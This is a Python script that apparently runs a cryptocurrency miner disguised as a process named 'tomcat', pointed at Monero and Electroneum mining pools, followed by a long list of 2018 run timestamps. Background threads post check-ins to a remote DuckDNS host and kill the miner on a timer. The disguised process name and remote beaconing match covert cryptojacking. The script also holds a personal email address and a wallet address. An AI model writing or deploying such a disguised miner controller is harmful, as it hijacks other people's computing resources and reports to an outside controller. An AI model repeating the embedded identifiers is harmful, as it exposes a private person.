import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:04.797024
#2018-02-17 16:16:07.281186
#2018-02-17 18:03:04.548133
#2018-02-17 19:50:05.236213
#2018-02-17 21:38:05.602041
#2018-02-17 23:22:06.938685
#2018-02-18 01:11:01.287214
#2018-02-18 02:58:05.450895
#2018-02-18 04:46:07.565005
#2018-02-18 06:37:04.085273
#2018-02-18 08:26:02.055293
#2018-02-18 10:14:04.948266
#2018-02-18 12:00:08.366682
#2018-02-18 13:44:01.433677
#2018-02-18 15:34:03.984923
#2018-02-18 17:22:04.736952
#2018-02-18 19:10:08.102788
#2018-02-18 20:56:01.650546
#2018-02-18 22:41:04.292989
#2018-02-19 00:30:04.479199
#2018-02-19 02:15:03.110279
#2018-02-19 04:02:06.178508
#2018-02-19 05:46:05.582362
#2018-02-19 07:36:06.442115
#2018-02-19 09:25:07.225911
#2018-02-19 11:14:07.824643
#2018-02-19 13:03:06.706956
#2018-02-19 14:49:04.907950
#2018-02-19 16:37:05.865726
#2018-02-19 18:25:07.608584
#2018-02-19 20:12:04.495336
#2018-02-19 22:01:07.760994
#2018-02-19 23:47:10.141178
#2018-02-20 01:34:07.652432
#2018-02-20 03:22:07.343450
#2018-02-20 05:08:07.375030
#2018-02-20 06:52:05.232744
#2018-02-20 08:39:05.337976
#2018-02-20 10:23:07.413106
#2018-02-20 12:09:04.438335
#2018-02-20 13:56:06.357020
#2018-02-20 15:39:09.913404
#2018-02-20 17:23:09.378549
#2018-02-20 19:13:07.822049
#2018-02-20 21:02:05.410056
#2018-02-20 22:48:05.970220
#2018-02-21 00:32:05.237282
#2018-02-21 02:17:04.369413
#2018-02-21 04:04:05.115137
#2018-02-21 05:50:08.174382
#2018-02-21 07:38:01.269081
#2018-02-21 09:23:05.230932
#2018-02-21 11:12:06.073770
#2018-02-21 13:00:12.506014
#2018-02-21 14:48:10.772939
#2018-02-21 16:35:04.320223
#2018-02-21 18:24:05.714391
#2018-02-21 20:09:01.474369
#2018-02-21 21:56:03.958423
#2018-02-21 23:42:04.295946
#2018-02-22 01:33:04.004978
#2018-02-22 03:20:10.403145
#2018-02-22 05:08:06.686556
#2018-02-22 06:51:05.101243
#2018-02-22 08:38:01.524017
#2018-02-22 10:25:07.892206
#2018-02-22 12:10:12.058163
#2018-02-22 13:55:11.608921
#2018-02-22 15:43:13.159733
#2018-02-22 17:29:04.519687
#2018-02-22 19:16:05.105001
#2018-02-22 21:07:02.116951
#2018-02-22 22:51:08.043442
#2018-02-23 00:39:04.087278
#2018-02-23 02:26:04.203147
#2018-02-23 04:14:04.369172
#2018-02-23 06:01:01.641041
#2018-02-23 07:31:02.141815
#2018-02-23 09:31:06.638806
#2018-02-23 11:19:06.612364
#2018-02-23 12:36:07.441769
#2018-02-23 14:01:09.443822
#2018-02-23 15:38:05.308779
#2018-02-23 17:12:07.096051
#2018-02-23 18:45:02.212476
#2018-02-23 20:18:05.550535
#2018-02-23 21:51:06.410773
#2018-02-23 23:29:07.522269
#2018-02-24 01:03:03.894341
#2018-02-24 02:47:01.433060
#2018-02-24 04:23:01.834022
#2018-02-24 05:48:07.969593
#2018-02-24 07:23:02.164867
#2018-02-24 08:57:05.638050
#2018-02-24 10:27:03.601635
#2018-02-24 12:09:04.520724
#2018-02-24 13:40:02.961141
#2018-02-24 15:11:07.673836
#2018-02-24 16:44:08.033503
#2018-02-24 18:18:07.412433
#2018-02-24 19:48:05.725717
#2018-02-24 21:20:05.222262
#2018-02-25 01:18:01.663859
#2018-02-25 05:16:04.430551
#2018-02-25 11:14:01.237438